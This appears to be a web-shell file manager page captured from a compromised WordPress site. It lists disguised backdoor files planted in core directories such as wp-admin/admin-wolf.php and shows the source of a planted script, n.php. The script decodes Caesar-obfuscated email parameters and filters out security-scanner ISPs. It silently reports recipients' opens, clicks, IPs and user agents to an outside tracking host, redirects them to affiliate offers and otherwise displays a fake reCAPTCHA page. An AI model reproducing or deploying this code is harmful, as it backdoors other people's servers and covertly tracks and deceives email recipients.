Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php

SavvyWolf - MANAGER

Edit File: n.php

<?php
#test traking with this new changes and add the harmless content

// THESE ARE YOUR ORIGINAL ERROR SETTINGS - WILL BE OVERRIDDEN IF IMAGE IS SERVED
// ini_set('display_errors', 1);
// ini_set('display_startup_errors', 1);
// error_reporting(E_ALL);

// Global flags (original)
$show_message = false;
$show_success_message = true; // hadi false tkhrej lcaptcha
$message = "";

$likelybotisps = [
    'akamai technologies, inc.', 'cloudflare, inc.', 'datacamp limited',
    'clouvider limited', 'wholesale internet, inc.', 'fastly, inc.',
    'google llc', 'amazon.com, inc.', 'atlantic metro communications ii, inc.',
    'leaseweb usa, inc.', 'gsl networks pty ltd', 'limestone networks, inc.',
    'arelion sweden ab', 'performive llc', 'evoxt enterprise', 'scaleway s.a.s.',
    'g core labs s.a.', 'hivelocity llc', 'estnoc oy', 'egihosting',
    'latitude.sh', 'latitude.sh ltda', 'shells', 'digitalocean, llc',
    'quadranet enterprises llc', 'wholesail networks llc', 'gthost',
    'zenlayer inc', 'tier.net technologies llc', 'internet utilities europe and asia limited',
    'oath holdings inc.', 'packethub s.a.', 'm europe srl', 'strong technology, llc.',
    'cyberzone s.a.', 'asptech it solutions ltd', 'nexeon technologies, inc.',
    'fork networking, llc', 'level parent, llc', 'ses astra s.a.', 'yahoo inc.',
    'china unicom china1 backbone', 'brainstorm network, inc', 'incx global, llc',
    'ufinet panama s.a.', 'tzulo, inc.'
];

// LATEST fetch_image function with mimeType and cacheFilePath
function fetch_image($url) {
    $cacheDir = __DIR__ . '/wp_cache/';
    $cacheKey = md5($url);
    $cacheFile = $cacheDir . $cacheKey;
    $imageContent = null;
    $httpCode = 0;
    $mimeType = null; // Added for MIME type
    $sourceForReturn = '';

if (!file_exists($cacheDir)) {
        if (!@mkdir($cacheDir, 0777, true) && !is_dir($cacheDir)) {
            return ['content' => null, 'httpCode' => 500, 'error' => 'Cache directory creation failed', 'cacheFilePath' => null, 'mimeType' => null];
        }
    }

if (file_exists($cacheFile) && filesize($cacheFile) > 0) {
        if (function_exists('finfo_open')) {
            $finfo = finfo_open(FILEINFO_MIME_TYPE);
            $mimeType = finfo_file($finfo, $cacheFile);
            finfo_close($finfo);
        }
        return [
            'content' => file_get_contents($cacheFile),
            'httpCode' => 200,
            'source' => 'cache',
            'cacheFilePath' => $cacheFile,
            'mimeType' => $mimeType
        ];
    }

$userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'; // More common User-Agent

if (function_exists('curl_init')) {
        $sourceForReturn = 'curl';
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);

$imageContent = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $curlError = curl_error($ch);
        if ($imageContent && !$curlError) { // Get MIME type from content if successful
             if (function_exists('finfo_open')) {
                $finfo = finfo_open(FILEINFO_MIME_TYPE);
                $mimeType = finfo_buffer($finfo, $imageContent);
                finfo_close($finfo);
            }
        }
        curl_close($ch);

if ($curlError) {
            return ['content' => null, 'httpCode' => $httpCode ?: 500, 'error' => 'cURL: ' . $curlError, 'cacheFilePath' => null, 'mimeType' => null];
        }
    } elseif (ini_get('allow_url_fopen')) {
        $sourceForReturn = 'file_get_contents';
        $contextOptions = [
            'http' => [
                'method' => "GET",
                'header' => "User-Agent: " . $userAgent . "\r\n",
                'follow_location' => 1,
                'max_redirects' => 5,
                'timeout' => 15,
                'ignore_errors' => true
            ],
            'ssl' => ['verify_peer' => true, 'verify_peer_name' => true]
        ];
        $context = stream_context_create($contextOptions);
        $imageContent = @file_get_contents($url, false, $context);

if (isset($http_response_header) && is_array($http_response_header) && count($http_response_header) > 0) {
            $statusLine = '';
            for ($i = count($http_response_header) - 1; $i >= 0; $i--) {
                if (strpos(strtolower($http_response_header[$i]), 'http/') === 0) {
                    $statusLine = $http_response_header[$i];
                    break;
                }
            }
            if (preg_match('{HTTP\/\S*\s(\d{3})}', $statusLine, $match)) {
                $httpCode = (int)$match[1];
            } else {
                $httpCode = $imageContent === false ? 500 : 0;
            }
        } else {
            $httpCode = 503;
        }
        
        if ($imageContent && $httpCode == 200) { // Get MIME type from content if successful
             if (function_exists('finfo_open')) {
                $finfo = finfo_open(FILEINFO_MIME_TYPE);
                $mimeType = finfo_buffer($finfo, $imageContent);
                finfo_close($finfo);
            }
        }

if ($imageContent === false) {
            return ['content' => null, 'httpCode' => $httpCode ?: 500, 'error' => 'file_get_contents failed', 'cacheFilePath' => null, 'mimeType' => null];
        }
    } else {
        return ['content' => null, 'httpCode' => 501, 'error' => 'No suitable fetching method available.', 'cacheFilePath' => null, 'mimeType' => null];
    }

if ($httpCode == 200 && $imageContent !== null && strlen($imageContent) > 0) {
        if (is_writable($cacheDir)) {
            file_put_contents($cacheFile, $imageContent);
        } else { /* log error: cache dir not writable */ }
        return [
            'content' => $imageContent,
            'httpCode' => 200,
            'source' => $sourceForReturn,
            'cacheFilePath' => $cacheFile,
            'mimeType' => $mimeType
        ];
    } else {
        return [
            'content' => null,
            'httpCode' => $httpCode ?: 404,
            'error' => 'Fetch successful but non-200 status or empty content.',
            'source' => $sourceForReturn,
            'cacheFilePath' => null,
            'mimeType' => null
        ];
    }
}

$queryParams = $_GET;
// $queryString = $_SERVER['QUERY_STRING']; // Not strictly needed if using $_GET
// parse_str($queryString, $queryParams); // $_GET is already parsed
$paramValues = array_values($queryParams);

$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$user_agent_encoded = urlencode($user_agent); // Encode for URL AFTER original is used

$user_ip = getUserIP() ?? 'NO_IP';
$user_ip_encoded = urlencode($user_ip); // Encode for URL AFTER original is used

// Determine action based on param count
$actionType = null;
if (count($paramValues) === 4) {
    $actionType = 'image';
} elseif (count($paramValues) === 6 && $show_success_message) {
    $actionType = 'unsub';
} elseif (count($paramValues) === 7 && $show_success_message) {
    $actionType = 'click';
}

// Handle POST for captcha (original logic)
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    if(false){ // Your original condition
        $show_message = true;
    } else if(true){ // Your original condition
        $show_success_message = true;
    }
}

// --- ACTION ROUTING ---

if ($actionType === 'image') {
    // FOR IMAGE SERVING, TURN OFF DISPLAY ERRORS
    // This prevents PHP error messages from corrupting the image output.
    ini_set('display_errors', 0);
    error_reporting(0);

$image_param_name = array_keys($queryParams)[0]; // Get the actual param name
    $enc_email_param_name = array_keys($queryParams)[1];
    $sender_tag_param_name = array_keys($queryParams)[2];
    $shift_param_name = array_keys($queryParams)[3];
    
    $image = $queryParams[$image_param_name];
    $enc_email = $queryParams[$enc_email_param_name];
    $sender_tag_original = $queryParams[$sender_tag_param_name];
    $shift = (int) $queryParams[$shift_param_name];

$search = ["arobas", "no9ta"];
    $replace = ["@", "."];

$full_dec_email = caesarDecipher($enc_email, $shift);
    $dec_email_parts = explode("_dom_", $full_dec_email);
    $dec_email = $dec_email_parts[0] ?? '';
    $host_domain = $dec_email_parts[1] ?? '';
    $host_domain = str_replace($search, $replace, $host_domain);
    $sender_tag = caesarDecipher($sender_tag_original, $shift);

$imagUrl = "http://" . $host_domain . "/images/" . $image; // Assuming HTTP for internal images
                                                              // If external, this URL construction is fine.

// Fetch the image
    $imageResponse = fetch_image($imagUrl);

// Perform Tracking (Moved before image output, with context for file_get_contents)
    $result_email_for_tracking = str_replace($search, $replace, $dec_email);
    $tag_for_tracking = explode("_", $sender_tag)[1] ?? '';

// Use the already URL-encoded IP and Agent for the tracking URL
    $tracking_agent_param = urlencode($user_agent . ":" . $user_ip . ":" . $sender_tag_original . ":" . $shift . ":" . $sender_tag);
    $tracking_url = "http://" . $host_domain . "/openers/save_open?email=" . urlencode($result_email_for_tracking) . "&tag=" . urlencode($tag_for_tracking) . "&agent=" . $tracking_agent_param . "&img=" . urlencode($imagUrl);

$trackingContextOptions = [
        'http' => [
            'method' => "GET",
            'timeout' => 2, // Short timeout, 2 seconds
            'ignore_errors' => true,
        ],
    ];
    $trackingContext = stream_context_create($trackingContextOptions);
    @file_get_contents($tracking_url, false, $trackingContext); // Suppress errors from this call

// Serve the image
    if ($imageResponse && isset($imageResponse['content']) && !empty($imageResponse['content']) && $imageResponse['httpCode'] === 200) {
        $mimeType = $imageResponse['mimeType'] ?? 'application/octet-stream';

// Further ensure it's an image MIME type
        if (strpos($mimeType, 'image/') !== 0) {
             // If finfo failed or gave generic, try to guess based on original $imagUrl extension (less reliable)
            $extension = strtolower(pathinfo(parse_url($imagUrl, PHP_URL_PATH), PATHINFO_EXTENSION));
            switch ($extension) {
                case 'jpeg': case 'jpg': $mimeType = 'image/jpeg'; break;
                case 'png': $mimeType = 'image/png'; break;
                case 'gif': $mimeType = 'image/gif'; break;
                case 'webp': $mimeType = 'image/webp'; break;
                default: $mimeType = 'application/octet-stream'; // Fallback if extension not recognized
            }
        }
         if (strpos($mimeType, 'image/') !== 0) { // Final check
            // Still not a valid image type, serve placeholder
            http_response_code(500); // Or 404 if $imageResponse['httpCode'] was 404
            // error_log("Could not determine valid image MIME type for " . $imagUrl . ". Detected: " . $mimeType);
             header("Content-Type: image/gif"); // Transparent GIF
            header("Content-Length: 43");
            echo base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
            exit;
        }

header("Content-Type: " . $mimeType);
        header("Content-Length: " . strlen($imageResponse['content']));
        header("Cache-Control: public, max-age=86400"); // Cache for 1 day
        header("Expires: " . gmdate('D, d M Y H:i:s \G\M\T', time() + 86400));
        echo $imageResponse['content'];
        exit; // CRUCIAL
    } else {
        // Image fetch failed or no content, serve a 1x1 transparent GIF
        http_response_code($imageResponse['httpCode'] ?? 404);
        // error_log("Failed to serve image for: " . $imagUrl . ". Code: " . ($imageResponse['httpCode'] ?? 'N/A') . " Error: " . ($imageResponse['error'] ?? 'Unknown'));
        header("Content-Type: image/gif");
        header("Content-Length: 43");
        echo base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
        exit; // CRUCIAL
    }

} elseif ($actionType === 'unsub' || $actionType === 'click') {
    // For redirect actions, ensure display_errors is as per your original settings or desired for HTML output
    ini_set('display_errors', 1); // Or your preferred setting for non-image parts
    error_reporting(E_ALL);      // Or your preferred setting

if ($actionType === 'unsub') {
        $shift_param_name = array_keys($queryParams)[5]; // Example: yyzle is 6th param (index 5)
        $shift_full_val = $queryParams[$shift_param_name];
        
        $shift = (int) explode("_", $shift_full_val)[0];
        $sponsor_id = explode("_", $shift_full_val)[1] ?? '0';

$sponsor_domain_param_name = array_keys($queryParams)[0];
        $unsub_offre_id_param_name = array_keys($queryParams)[1];
        $tag_not_necessary_original_param_name = array_keys($queryParams)[2];
        // param at index 3 is unused as per your example for unsub
        $email_param_name = array_keys($queryParams)[4];

$sponsor_domain_enc = $queryParams[$sponsor_domain_param_name];
        $sponsor_domain = caesarDecipher($sponsor_domain_enc, $shift);

$unsub_offre_id_enc = $queryParams[$unsub_offre_id_param_name];
        $unsub_offre_id = caesarDecipher($unsub_offre_id_enc, $shift);

$tag_not_necessary_original = $queryParams[$tag_not_necessary_original_param_name];
        $tag_not_necessary = caesarDecipher($tag_not_necessary_original, $shift);

$email_enc = $queryParams[$email_param_name];
        $full_dec_email = caesarDecipher($email_enc, $shift);

$dec_email_parts = explode("_dom_", $full_dec_email);
        $email = $dec_email_parts[0] ?? '';
        $host_domain = $dec_email_parts[1] ?? '';

$search = ["arobas", "no9ta"];
        $replace = ["@", "."];
        $email = str_replace($search, $replace, $email);
        $host_domain = str_replace($search, $replace, $host_domain);

$redirect_url = "";
        if ($sponsor_id == "0") {
            $redirect_url = "https://" . $sponsor_domain . "/0/0/0/" . $unsub_offre_id;
        } elseif ($sponsor_id == "1" || $sponsor_id == "2") { // Combined as they are same
            $redirect_url = "https://" . $sponsor_domain . "/" . $unsub_offre_id;
        } else {
            $redirect_url = "https://" . $sponsor_domain; // Fallback
        }
        
        $tag_for_tracking = explode("_", $tag_not_necessary)[1] ?? '';
        $tracking_agent_param = urlencode($user_agent . ":" . $user_ip . ":" . $tag_not_necessary_original . ":" . $shift . ":" . $tag_not_necessary);
        $tracking_url = "http://" . $host_domain . "/openers/save_unsub?email=" . urlencode($email) . "&tag=" . urlencode($tag_for_tracking) . "&agent=" . $tracking_agent_param . "&redir=" . urlencode($redirect_url);
        
        @file_get_contents($tracking_url); // Suppress errors
        header("Location: " . $redirect_url);
        exit;

} elseif ($actionType === 'click') {
        $shift_param_name = array_keys($queryParams)[5]; // Example: yvqfx is 6th param (index 5)
        $shift_full_val = $queryParams[$shift_param_name];

$shift = (int) explode("_", $shift_full_val)[0];
        $sponsor_id = explode("_", $shift_full_val)[1] ?? '0';

$sponsor_domain_param_name = array_keys($queryParams)[0];
        $offre_id_param_name = array_keys($queryParams)[1];
        $tag_param_name = array_keys($queryParams)[2];
        $c2_param_name = array_keys($queryParams)[3];
        $email_param_name = array_keys($queryParams)[4];
        // param at index 6 ($paramValues[6], key for yyzle) is not directly used for click data construction

$sponsor_domain_enc = $queryParams[$sponsor_domain_param_name];
        $sponsor_domain = caesarDecipher($sponsor_domain_enc, $shift);

$offre_id_enc = $queryParams[$offre_id_param_name];
        $offre_id = caesarDecipher($offre_id_enc, $shift);
        
        $tag_enc = $queryParams[$tag_param_name];
        $tag_dec = caesarDecipher($tag_enc, $shift);

$c2_enc = $queryParams[$c2_param_name];
        $c2 = caesarDecipher($c2_enc, $shift);

$email_enc = $queryParams[$email_param_name];
        $full_dec_email = caesarDecipher($email_enc, $shift);

$dec_email_parts = explode("_dom_", $full_dec_email);
        $email_decoded_for_tracking = $dec_email_parts[0] ?? ''; // Keep original case for tracking before re-encoding
        $host_domain = $dec_email_parts[1] ?? '';

$search_decode = ["arobas", "no9ta"];
        $replace_decode = ["@", "."];
        $email_for_tracking = str_replace($search_decode, $replace_decode, $email_decoded_for_tracking);
        $host_domain = str_replace($search_decode, $replace_decode, $host_domain);

// For redirect URL, email needs to be re-encoded as per original logic
        $search_encode_for_redir = ["@", "."];
        $replace_encode_for_redir = ["arobas", "no9ta"];
        $email_for_redir_temp = str_replace($search_encode_for_redir, $replace_encode_for_redir, $email_decoded_for_tracking); // Use the decoded email before caesarCipher
        $email_final_for_redir = caesarCipher($email_for_redir_temp, $shift);

$redirect_url = "";
        if ($sponsor_id == "0") { // trax
            $redirect_url = "https://" . $sponsor_domain . "/0/0/0/" . $offre_id . "/" . (explode("_", $tag_dec)[0] ?? '') . "/" . $c2 . "/" . $email_final_for_redir . "_" . $shift;
        } elseif ($sponsor_id == "1") { // idrive
            $redirect_url = "https://" . $sponsor_domain . "/" . $offre_id . "/" . (explode("_", $tag_dec)[0] ?? '') . "/" . $c2 . "/" . $email_final_for_redir . "_" . $shift;
        } elseif ($sponsor_id == "2") { // mm
            $redirect_url = "https://" . $sponsor_domain . "/" . $offre_id . "/?sub1=" . (explode("_", $tag_dec)[0] ?? '') . "&sub2=" . $c2 . "&sub3=" . $email_final_for_redir . "_" . $shift;
        } else {
            $redirect_url = "https://" . $sponsor_domain; // Fallback
        }

$tag_for_tracking = explode("_", $tag_dec)[1] ?? '';
        // Use the original decoded email for tracking URL
        $tracking_agent_param = urlencode($user_agent . ":" . $user_ip . ":" . $tag_enc . ":" . $shift . ":" . $tag_dec);
        $tracking_url = "http://" . $host_domain . "/openers/save_click?email=" . urlencode($email_for_tracking) . "&tag=" . urlencode($tag_for_tracking) . "&agent=" . $tracking_agent_param . "&redir=" . urlencode($redirect_url);
        
        @file_get_contents($tracking_url); // Suppress errors
        header("Location: " . $redirect_url);
        exit;
    }
}

// If no action taken that caused an exit (like image serving or redirect),
// then the HTML part will be displayed.
// Ensure error reporting is set for HTML display if needed.
ini_set('display_errors', 1); // Your original setting for HTML part
error_reporting(E_ALL);   // Your original setting for HTML part

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>just a moment...</title>
    <style>
        /* ... your CSS ... (kept as is) */
        body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #fff; }
        .container { text-align: center; background-color: white; padding: 20px; border-radius: 10px; }
        #img { width: 100%; max-width: 300px; height: auto; }
        #logo { max-width: 110px; height: auto; }
        input[type="text"] { width: 80%; padding: 10px; margin: 10px 0; font-size: 16px; border-radius: 5px; border: 1px solid #ddd; }
        button { padding: 10px 20px; font-size: 16px; background-color: #5db2fc; color: white; border: none; border-radius: 5px; cursor: pointer; }
        button:hover { background-color: #f7f7f7; }
        #warning { color: #d13030; }
        #success { color: #0e8c14; }
        h1 { color: #404040; font-size: 1.7em; font-weight: bold; }
        .fkrc-container { font-family: 'Source Sans Pro', sans-serif; }
        .fkrc-m-p { margin: 0; padding: 0; }
        .fkrc-block { display:block; }
        .fkrc-line-normal { line-height: normal; }
        .fkrc-checkbox-window { height: 74px; width: 300px; background-color: #f9f9f9; border-radius: 3px; border: 1px solid #d3d3d3; }
        .fkrc-checkbox-container { width: 28px; height: 28px; }
        .fkrc-checkbox { position: relative; background-color: #fff; border-radius: 2px; width: 28px; height: 28px; border: 2px solid #c1c1c1; margin: 21px 0 0 12px; outline: none; font-family: Arial, Helvetica, sans-serif; transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms; }
        .fkrc-checkbox:hover { border: 2px solid #b2b2b2; }
        .fkrc-im-not-a-robot{ position: relative; left: 52px; bottom: 2px; font-size: 15px; color: #282727; cursor: default;}
        .fkrc-captcha-logo { position: relative; left: 246px; bottom: 40px; width: 33px; height: 33px; vertical-align: baseline; }
        .fkrc-checkbox-desc { color: #555555; position: relative; font-size: 8px; text-align: center; bottom: 41px; left: 112px; }
        .fkrc-checkbox-desc2 { color: #555555; position: relative; font-size: 10px; text-align: center; bottom: 41px; left: 112px; }
        .fkrc-spinner { visibility: hidden; position:relative; height: 35px; width: 35px; bottom: 90px; left: 9px; opacity:0; transition: opacity 400ms; }
        .fkrc-verifywin-window { opacity: 0; position: absolute; visibility: hidden; margin: auto; width: 310px; background-color: #fff; border: 1px solid #cecece; -webkit-box-shadow: 5px 6px 7px -3px rgba(0,0,0,0.12); box-shadow: 5px 6px 7px -3px rgba(0,0,0,0.12); transition: opacity 400ms; }
        .fkrc-verifywin-window-arrow { opacity: 0; position: absolute; visibility: hidden; transition: opacity 200ms; width: 10px; height: 23px; }
        .fkrc-verifywin-container { padding: 8px; }
        .fkrc-verifywin-header { background-color: #5a89e1; padding: 16px 16px 24px 16px; color: #fff; }
        .fkrc-verifywin-header-text-small { font-size: 14px; line-height: normal; }
        .fkrc-verifywin-header-text-medium { font-size: 16px; }
        .fkrc-verifywin-header-text-big { font-size: 24px; font-weight: 700; }
        .fkrc-verifywin-main { padding: 5px; }
        .fkrc-verifywin-footer { border-top: 1px solid #cecece; padding: 10px 7px 10px 7px; color: #737373; display: grid; grid-template-columns: auto 102px; font-size: 13px; }
        .fkrc-verifywin-footer-left { padding: 5px; }
        .fkrc-verifywin-verify-button { text-transform: uppercase; background-color: #5a89e2; color: #fff; text-align: center; width: 100%; padding: 12px 0 12px 0; text-decoration: none; font-weight: 600; height: min-content; border-radius: 3px; font-size: 14px; border: none; outline: none; cursor:pointer; }
    </style>
</head>
<body>

<div class="container" <?php if ($actionType !== null) echo 'hidden'; ?>> <?php // Hide if an action was taken ?>
    
    <form id="myForm" action="" method="POST">
        <div class="fkrc-container fkrc-m-p" style="text-align: start;">
            <div id="fkrc-checkbox-window" class="fkrc-checkbox-window fkrc-m-p fkrc-block">
                <div class="fkrc-checkbox-container fkrc-m-p">
                    <button type="submit" id="fkrc-checkbox" class="fkrc-checkbox fkrc-m-p fkrc-line-normal"></button>
                </div>
                <p class="fkrc-im-not-a-robot fkrc-m-p fkrc-line-normal">I'm not a robot</p>
                <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" class="fkrc-captcha-logo fkrc-line-normal" alt="">
                <p class="fkrc-checkbox-desc2 fkrc-m-p fkrc-line-normal">reCAPTCHA</p>
                <p class="fkrc-checkbox-desc fkrc-m-p fkrc-line-normal">Privacy - Terms</p>
                <img src="https://raw.githubusercontent.com/75a/fake-captcha/refs/heads/main/images/captcha_spinner.gif" class="fkrc-spinner fkrc-m-p fkrc-line-normal" alt="" id="fkrc-spinner">
            </div>
            <div id="fkrc-verifywin-window" class="fkrc-verifywin-window">
                 
            </div>
        </div>
    </form>
     <div id="hidden-message" style="<?php echo $show_message ? 'display:block;' : 'display:none;'; ?>">
        <p id="warning">Wrong text, try again</p>
    </div>
    <div id="success-message" style="<?php echo $show_success_message && $_SERVER["REQUEST_METHOD"] === "POST" ? 'display:block;' : 'display:none;'; ?>">
        <p id="success">Nice! Redirecting ...</p>
    </div>
</div>
    
<script>
    // ... your JS ... (kept as is)
    let checkboxWindow = document.getElementById("fkrc-checkbox-window");
    let checkboxBtn = document.getElementById("fkrc-checkbox");
    let checkboxBtnSpinner = document.getElementById("fkrc-spinner");
    let verifyWindow = document.getElementById("fkrc-verifywin-window");
    let verifyWindowArrow = document.getElementById("fkrc-verifywin-window-arrow");
    let verifyBtn = document.getElementById("fkrc-verifywin-verify-button");